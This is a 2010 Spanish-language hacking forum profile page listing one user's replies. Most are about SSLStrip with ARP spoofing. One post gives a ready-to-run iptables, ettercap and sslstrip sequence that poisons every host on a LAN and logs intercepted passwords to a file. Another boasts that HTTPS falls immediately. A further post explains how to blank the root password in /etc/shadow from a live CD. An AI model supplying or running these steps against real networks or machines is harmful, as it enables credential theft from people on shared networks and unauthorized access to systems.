elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Hacking / Re: Problemas Sslstrip en: 28 Septiembre 2010, 05:14 am
claro, porque tu usarás otro sniffer, como el wireshark o algo así!

No mi bro... yo no uso otro sniffer.... has pruebas si quieres.... sólo iptables + arspoof + sslstrip

Saludos!  ;D
2  Seguridad Informática / Hacking / Re: Problemas Sslstrip en: 26 Septiembre 2010, 22:55 pm
ok... ya entiendo el uso del ettercap en este post... pero bueno aun así no veo la necesidad de usar el ettercap.

Yo uso solamente el SSLStrip con el ArpSpoof y me funciona de maravilla. Las https caen enseguida  :laugh:
3  Seguridad Informática / Hacking / Re: Problemas Sslstrip en: 26 Septiembre 2010, 22:23 pm
para hacer un mitm :) o sino como te va a enviar la victima los dateles? xD

mmmm..... pues mira que usando solo el arpspoof haces el MitM  :silbar:

o usando solo el ettercap haces tambien el MitM por eso digo que no veo la necesidad de mezclarlos...

o hay algo mas detrás??? explícame que esa es mi duda...
4  Seguridad Informática / Hacking / Re: Imposible Actualizar Metasploit BT4 R1 en: 25 Septiembre 2010, 22:24 pm
Para actualizarlo, tan solo tendremos que ir a la carpeta de Metasploit (/pentest/exploits/
framework3/) y ejecutar la orden “svn update”.

fuente: Revista Linux+.

bueno ya no es necesario ponernos como root porque en el BT ya estamos como root
5  Seguridad Informática / Hacking / Re: Problemas Sslstrip en: 25 Septiembre 2010, 21:48 pm
El segundo problema que veo con el sslstrip. alguien me puede explicar porque usan ettercap con arpspoof????

porque yo no le veo el caso!!!!!!!!!!!!!!!!!!!!!!!!!!!
6  Seguridad Informática / Hacking / Re: Ettercap+Sslstrip en: 25 Septiembre 2010, 21:45 pm
mejor prueba esto

pero si lo quieres hacer con ettercap puedes probar esto:

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
ettercap -TqM arp // // -i eth0
sslstrip -w passwords
tail -f passwords

con esos pasos ahorras hacer 1 al ip_forward y ya no usas arpspoof además envenenas a todos en la LAN xD

algo tarde pero pues a lo mejor a alguien le sirve... :p
7  Seguridad Informática / Hacking / Re: No recuerdo usuario ni pass backtrack 4 en: 25 Septiembre 2010, 21:20 pm
Puedes usar un live cd de cualquier distro, simplemente montas la particion donde está instalado el sistema que no recuerdas la password y como ya te dijeron el archivo a editar es /etc/shadow ahi busca una linea que diga root: por lo regular es la primera y dejala de esta forma:

root::14788:0:99999:7:::

es decir, eliminar la contraseña cifrada.... y cuando te loggeas usa root y como pass nada
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines